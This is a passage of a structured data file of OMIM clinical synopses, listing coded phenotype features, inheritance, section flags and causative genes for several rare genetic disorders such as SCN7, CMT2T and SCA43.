'skeletalSkull': '''Microcephaly, progressive {UMLS C1850456 HP:0000253} {HPO HP:0000253 C1850456};\nUnicoronal or bicoronal craniosynostosis {UMLS C4313927};\nLambdoid or bilateral lambdoid craniosynostosis {UMLS C4313926};\nSagittal craniosynostosis {SNOMEDCT:109418001} {UMLS C0432123 HP:0004442} {HPO HP:0004442 C0432123};\nLarge anterior fontanel {UMLS C1866134 HP:0000260} {HPO HP:0000260 C1866134};\nCopper-beaten appearance of skull {UMLS C4227980}''',
'skeletalSpine': '''Scoliosis (in 1 patient) {UMLS C2750812} {HPO HP:0002650 C0037932,C0700208};\nC1-C3 fusion (in 1 patient) {UMLS C4313925};\nC4-C7 fusion (in 1 patient) {UMLS C4313924};\nThoracic vertebral segmentation defects (in 1 patient) {UMLS C4313923}''',
'skeletalLimbs': '''Patellar aplasia/hypoplasia {UMLS C1868577 HP:0006498} {HPO HP:0006498 C1868577};\nBilateral radial head dislocation {UMLS C4313922};\nBowed legs (in 1 patient) {UMLS C4313766} {HPO HP:0002979 C0544755};\nJoint laxity (in 1 patient) {UMLS C4313921} {HPO HP:0001388 C0086437,C0158359}''',
'skeletalHands': '''Digital clubbing (in 1 patient) {UMLS C4313920} {HPO HP:0001217 C0149651};\nSyndactyly of second, third, and fourth fingers, mild (in 1 patient) {UMLS C4313919};\nPreaxial polydactyly, bilateral (in 1 patient) {UMLS C4313918} {HPO HP:0100258 C0345354}''',
'skeletalFeet': 'Syndactyly of second and third toes {UMLS C4551570 HP:0004691} {HPO HP:0004691 C0432040}',
'neurologicCentralNervousSystem': '''Developmental delay, mild to severe {UMLS C2673867} {HPO HP:0001263 C0557874,C1864897,C4020875};\nChiari I malformation (in 1 patient) {UMLS C4313930} {HPO HP:0007099 C0750929}''',
'molecularBasis': 'Caused by mutation in the cell division cycle 45, S. cerevisiae, homolog-like gene (CDC45L, {603465.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': True,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': True,
'chestExists': True,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': True,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': True,
'genitourinaryExternalGenitaliaFemaleExists': True,
'genitourinaryInternalGenitaliaMaleExists': True,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': True,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': True,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': True,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': False,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617014,
'prefix': '#',
'preferredTitle': 'NEUTROPENIA, SEVERE CONGENITAL, 7, AUTOSOMAL RECESSIVE; SCN7',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'immunology': '''Recurrent infections {SNOMEDCT:451991000124106} {UMLS C0239998 HP:0002719} {HPO HP:0002719 C0239998};\nNeutropenia {SNOMEDCT:303011007,165517008,84828003} {ICD10CM:D70,D70.9,D72.819} {ICD9CM:288.50,288.0,288.00} {UMLS C0027947,C0023530,C0853697 HP:0001882,HP:0001875} {HPO HP:0001875 C0853697};\nBone marrow shows normal myeloid maturation {UMLS C4314135};\nPoor response to G-CSF {UMLS C4314134}''',
'miscellaneous': '''Onset in infancy or early childhood {UMLS C1837138};\nSome patients may show a response to GM-CSF treatment {UMLS C4314133}''',
'molecularBasis': 'Caused by mutation in the colony-stimulating factor 3 receptor, granulocyte gene (CSF3R, {138971.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617065,
'prefix': '#',
'preferredTitle': 'EPILEPTIC ENCEPHALOPATHY, EARLY INFANTILE, 40; EIEE40',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckEyes': 'Poor or absent eye contact {UMLS C4313913}',
'muscleSoftTissue': 'Hypotonia, axial {UMLS C1853743 HP:0008936}',
'neurologicCentralNervousSystem': '''Epileptic encephalopathy {SNOMEDCT:723125008} {UMLS C0543888 HP:0200134} {HPO HP:0200134 C0543888};\nSeizures, refractory {UMLS C2676167};\nHypsarrhythmia {SNOMEDCT:28055006} {ICD10CM:G40.82} {ICD9CM:345.6} {UMLS C0684276,C0037769 HP:0011097,HP:0002521} {HPO HP:0002521 C0684276};\nArrest of development {UMLS C1408660};\nMental retardation, profound {SNOMEDCT:31216003} {ICD10CM:F73} {UMLS C0020796 HP:0002187} {HPO HP:0002187 C0020796,C3161330};\nSpasticity {SNOMEDCT:221360009,397790002} {UMLS C0026838,C4553743 HP:0001257} {HPO HP:0001257 C0026838};\nDystonic fits {UMLS C4313915};\nMyoclonus {SNOMEDCT:17450006} {ICD10CM:G25.3} {ICD9CM:333.2} {UMLS C0027066 HP:0001336} {HPO HP:0001336 C0027066,C1854302};\nChoreoathetosis {SNOMEDCT:43105007} {UMLS C0085583 HP:0001266} {HPO HP:0001266 C0085583,C0234967};\nInability to handle objects {UMLS C4313914};\nCortical atrophy {SNOMEDCT:278849000} {UMLS C0235946,C4551583 HP:0002120,HP:0002059} {HPO HP:0002120 C0235946}''',
'miscellaneous': '''Onset of seizures in early infancy {UMLS C4313912};\nOne consanguineous Algerian family has been reported (last curated August 2016) {UMLS C4313911}''',
'molecularBasis': 'Caused by mutation in the GUF1 GTPase, S. Cerevisiae, homolog of, gene (GUF1, {617064.0001}).',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617017,
'prefix': '#',
'preferredTitle': 'CHARCOT-MARIE-TOOTH DISEASE, AXONAL, TYPE 2T; CMT2T',
'inheritance': '''Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899};\nAutosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}''',
'muscleSoftTissue': '''Distal muscle weakness due to peripheral neuropathy {UMLS C1836731};\nDistal muscle atrophy due to peripheral neuropathy {UMLS C1844874}''',
'neurologicCentralNervousSystem': 'No dementia {UMLS C1838634}',
'neurologicPeripheralNervousSystem': '''Axonal sensorimotor neuropathy {SNOMEDCT:230657007} {UMLS C0393907};\nDistal sensory impairment {UMLS C1847584 HP:0002936} {HPO HP:0002936 C1847584};\nFoot drop {SNOMEDCT:6077001} {UMLS C0085684 HP:0009027} {HPO HP:0009027 C0085684,C1866141};\nGait instability {SNOMEDCT:394616008,22631008} {UMLS C0231686 HP:0002317} {HPO HP:0002317 C0231686};\nHyporeflexia {SNOMEDCT:22994000,405946002} {UMLS C0151888,C0700078 HP:0001315,HP:0001265} {HPO HP:0001265 C0700078};\nAreflexia {SNOMEDCT:37280007} {UMLS C0234146 HP:0001284} {HPO HP:0001284 C0234146,C0241772,C0278124};\nLoss of large myelinated fibers seen on sural nerve biopsy {UMLS C3552146}''',
'miscellaneous': '''Adult onset (range 36 to 56 years) {UMLS C4314131} {HPO HP:0003581 C1853562};\nSlowly progressive {UMLS C1854494 HP:0003677} {HPO HP:0003677 C1854494};\nSome patients have heterozygous mutations and may show slightly later onset {UMLS C4314130}''',
'molecularBasis': 'Caused by mutation in the membrane metalloendopeptidase gene (MME, {120520.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': True,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617066,
'prefix': '#',
'preferredTitle': 'MUSCULAR DYSTROPHY, CONGENITAL, DAVIGNON-CHAUVEAU TYPE; MDCDC',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckMouth': 'High-arched palate (1 patient) {UMLS C3278542} {HPO HP:0000218 C0240635}',
'headAndNeckNeck': 'Neck muscle weakness {UMLS C0240479 HP:0000467} {HPO HP:0000467 C0240479}',
'respiratory': 'Respiratory insufficiency due to muscle weakness {UMLS C3806467 HP:0002747} {HPO HP:0002747 C3806467}',
'chestExternalFeatures': '''Pectus excavatum {SNOMEDCT:391987005,391982004} {ICD10CM:Q67.6} {ICD9CM:754.81} {UMLS C2051831,C0016842 HP:0000767} {HPO HP:0000767 C2051831};\nFlat thorax {UMLS C1864447};\nFunnel thorax {UMLS C4539574}''',
'abdomenGastrointestinal': 'Feeding difficulties due to muscle weakness {UMLS C4015366}',
'skeletal': 'Joint hyperlaxity {UMLS C1862377}',
'skeletalSpine': '''Scoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208};\nRigid spine {UMLS C1858025 HP:0003306} {HPO HP:0003306 C1858025}''',
'skinNailsHairSkin': '''Dry skin {SNOMEDCT:16386004} {UMLS C0151908,C0720057,C1963094 HP:0000958} {HPO HP:0000958 C0151908,C0259817};\nHyperelasticity, mild {UMLS C4313904};\nFollicular hyperkeratosis {SNOMEDCT:81845009,402341008,238629004} {UMLS C0334013 HP:0007502} {HPO HP:0007502 C0334013}''',
'muscleSoftTissue': '''Hypotonia, severe {UMLS C1839630 HP:0006829} {HPO HP:0006829 C1839630};\nMuscle biopsy shows dystrophic changes {UMLS C1864711 HP:0003560} {HPO HP:0003560 C0026850,C1864711};\nFiber size variability {UMLS C3552710};\nRounded fibers {UMLS C4313909};\nCentralized nuclei {UMLS C1842170 HP:0003687} {HPO HP:0003687 C1842170};\nMinicore lesions {UMLS C4313908};\nAngular fibers {UMLS C4313907};\nCap lesions {UMLS C4313906};\nMyopathic features seen on EMG {UMLS C4231415};\nFatty degeneration of muscles {UMLS C4313905}''',
'neurologicCentralNervousSystem': '''Delayed motor development, severe {UMLS C3278698} {HPO HP:0001270 C1854301,C4020874};\nLearning difficulties (in 2 patients) {UMLS C4313910}''',
'miscellaneous': '''Onset at birth {UMLS C1836142 HP:0003577} {HPO HP:0003577 C1836142,C2752013};\nPatients become wheelchair bound in the second decade {UMLS C4313902};\nOne consanguineous family has been reported (last curated August 2016) {UMLS C4313901}''',
'molecularBasis': 'Caused by mutation in the thyroid hormone receptor interactor 4 gene (TRIP4, {604501.0003})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': True,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617018,
'prefix': '#',
'preferredTitle': 'SPINOCEREBELLAR ATAXIA 43; SCA43',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'headAndNeckEyes': '''Hypometric saccades (in some patients) {UMLS C3809329} {HPO HP:0000571 C0423082};\nNystagmus (in some patients) {UMLS C3549480} {HPO HP:0000639 C0028738}''',
'chestExternalFeatures': 'Pectus carinatum {SNOMEDCT:205101001,38774000} {ICD10CM:Q67.7} {ICD9CM:754.82} {UMLS C2939416,C0158731 HP:0000768} {HPO HP:0000768 C0158731}',
'skeletalFeet': 'Pes cavus {SNOMEDCT:36755004,302295001,86900005,205091006} {ICD10CM:Q66.7} {ICD9CM:754.71,736.73} {UMLS C0728829,C2239098,C0579144,C0039273 HP:0001761} {HPO HP:0001761 C0728829} {EOM ID:6edfece89c0b7df3 IMG:Pes_Cavus-small.jpg}',
'muscleSoftTissue': 'Distal amyotrophy {UMLS C1848736 HP:0003693} {HPO HP:0003693 C1848736}',
'neurologicCentralNervousSystem': '''Cerebellar ataxia {SNOMEDCT:85102008} {UMLS C0007758 HP:0001251} {HPO HP:0001251 C0007758};\nGait ataxia {SNOMEDCT:25136009} {ICD10CM:R26.0} {UMLS C0751837 HP:0002066} {HPO HP:0002066 C0751837};\nLimb ataxia {UMLS C0750937 HP:0002070} {HPO HP:0002070 C0750937};\nBalance problems {UMLS C0575090};\nDysarthria {SNOMEDCT:8011004} {ICD9CM:438.13,784.51} {UMLS C0013362,C4553903 HP:0001260} {HPO HP:0001260 C0013362};\nTremor {SNOMEDCT:26079004} {ICD10CM:R25.1} {UMLS C0040822,C4554265,C1963252 HP:0001337} {HPO HP:0001337 C0040822};\nUpper limb involvement (in some patients) {UMLS C3807867};\nRigidity (in some patients) {UMLS C4314129} {HPO HP:0002063 C0026837};\nCerebellar atrophy {UMLS C0740279 HP:0001272} {HPO HP:0001272 C0262404,C0740279,C4020873}''',
'neurologicPeripheralNervousSystem': '''Hyporeflexia {SNOMEDCT:22994000,405946002} {UMLS C0151888,C0700078 HP:0001315,HP:0001265} {HPO HP:0001265 C0700078};\nAxonal motor neuropathy {UMLS C2749625 HP:0007002};\nDistal sensory impairment (in some patients) {UMLS C3807562} {HPO HP:0002936 C1847584};\nDistal limb pain {UMLS C4314128}''',
'miscellaneous': '''Adult onset (range 42 to 68 years) {UMLS C4314126} {HPO HP:0003581 C1853562};\nSlowly progressive {UMLS C1854494 HP:0003677} {HPO HP:0003677 C1854494};\nOne Belgian family has been reported (last curated July 2016) {UMLS C4314125}''',
'molecularBasis': 'Caused by mutation in the membrane metalloendopeptidase gene (MME, {120520.0006})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': True,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': True,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617068,
'prefix': '#',
'preferredTitle': 'PORTAL HYPERTENSION, NONCIRRHOTIC; NCPH',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'abdomenLiver': '''Hepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209};\nPortal hypertension {SNOMEDCT:34742003} {ICD10CM:K76.6} {ICD9CM:572.3} {UMLS C4552669,C0020541 HP:0001409} {HPO HP:0001409 C0020541};\nFibromuscular thickening of the portal venules seen on biopsy {UMLS C4313900};\nNarrowed venule lumens {UMLS C4313899};\nNormal liver synthetic function {UMLS C4313898}''',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'abdomenGastrointestinal': 'Esophageal varices, small (in some patients) {UMLS C4313897}',
'laboratoryAbnormalities': 'Normal liver enzymes {SNOMEDCT:166642001} {UMLS C0438236}',
'miscellaneous': '''Onset in first or second decade {UMLS C1866641};\nStable clinical picture {UMLS C4313895};\nThree patients from 2 unrelated Turkish families have been reported (last curated August 2016) {UMLS C4313894}''',
'molecularBasis': 'Caused by mutation in the deoxyguanosine kinase gene (DGUOK, {601465.0008})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
